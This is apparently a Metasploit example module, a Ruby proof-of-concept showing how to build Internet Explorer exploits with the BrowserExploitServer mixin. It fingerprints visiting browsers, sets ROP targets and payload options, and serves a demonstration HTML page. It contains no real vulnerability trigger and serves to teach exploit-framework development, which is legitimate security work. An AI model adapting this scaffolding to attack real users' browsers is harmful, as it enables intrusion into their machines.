##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "IE Exploit for BrowserExploitServer Proof-of-Concept",
      'Description'    => %q{
        Here's an example of building an exploit using the BrowserExploitServer.
        This example requires the target to be exploit. If not, the mixin will
        send a fake 404 as a way to avoid engaging the target. The example is
        for Windows only.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     =>
        [
          [ 'URL', 'https://metasploit.com' ]
        ],
      'Platform'       => 'win',
      'BrowserRequirements' =>
        {
          :source => /script|headers/i,
          #:clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
          #:method => "LoadMovie",
          :os_name => /win/i
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [
            'Windows XP with IE 8',
            {
              'os_flavor' => 'XP',
              'ua_name'   => 'MSIE',
              'ua_ver'    => '8.0',
              'Rop'       => true,
              'Offset'    => 0x100
            }
          ],
          [
            'Windows 7 with IE 9',
            {
              'os_flavor' => '7',
              'ua_name'   => 'MSIE',
              'ua_ver'    => '9.0',
              'Rop'       => true,
              'Offset'    => 0x100
            }
          ],
          [
            'Windows 7 with IE 10',
            {
              'os_flavor' => '7',
              'ua_name'   => 'MSIE',
              'ua_ver'    => '10.0',
              'Rop'       => true,
              'Offset'    => 0x100
            }
          ]
        ],

      'Payload'        =>
        {
          'BadChars'        => "\x00",  #Our spray doesn't like null bytes
          'StackAdjustment' => -3500
        },
      'Privileged'     => false,
      'DisclosureDate' => "Apr 1 2013",
      'DefaultTarget'  => 0))
  end

  #
  # This example shows how to use ERB and being able to use the arguments and local vars
  #
  def exploit_template1(target_info, txt)
    txt2 = "I can use local vars!"

    template = %Q|
    <% msg = "This page is generated by an exploit" %>
    <%=msg%><br>
    <%=txt%><br>
    <%=txt2%><br>
    <p></p>
    Data gathered from source: #{target_info[:source]}<br>
    OS name: #{target_info[:os_name]}<br>
    Flavor: #{target_info[:os_flavor]}<br>
    UA name: #{target_info[:ua_name]}<br>
    UA version: #{target_info[:ua_ver]}<br>
    Java version: #{target_info[:java]}<br>
    Office version: #{target_info[:office]}<br>
    Silverlight enabled: #{target_info[:silverlight]}
    |

    return template, binding()
  end

  #
  # This example shows how to generate an ERB template without passing binding
  #
  def exploit_template2(target_info)
    %Q|
    <% msg = "This page is generated by an exploit" %>
    <%=msg%><br>
    <p></p>
    Data gathered from source: #{target_info[:source]}<br>
    OS name: #{target_info[:os_name]}<br>
    Flavor: #{target_info[:os_flavor]}<br>
    UA name: #{target_info[:ua_name]}<br>
    UA version: #{target_info[:ua_ver]}<br>
    Java version: #{target_info[:java]}<br>
    Office version: #{target_info[:office]}<br>
    Silverlight enabled: #{target_info[:silverlight]}
    |
  end

  def on_request_exploit(cli, request, target_info)
    vprint_status("Target selected: #{get_target.name}")
    print_line(Rex::Text.to_hex_dump([rop_junk].pack("V*")))
    print_line(Rex::Text.to_hex_dump([rop_nop].pack("V*")))
    p = get_payload(cli, target_info)
    vprint_line(Rex::Text.to_hex_dump(p))
    print_status("Sending exploit HTML...")

    # Randomly pick a template to test
    if [true, false].sample
      txt = "I can pass more args"
      send_exploit_html(cli, exploit_template1(target_info, txt))
    else
      send_exploit_html(cli, exploit_template2(target_info))
    end
  end

  def exploit
    super
  end

end

=begin
Example of raw target_info:
{:source=>"script", :os_name=>"Microsoft Windows", :os_flavor=>"XP", :ua_name=>"MSIE", :ua_ver=>"8.0", :arch=>"x86", :office=>"null", :proxy=>false, :language=>"en-us", :tried=>true}
=end
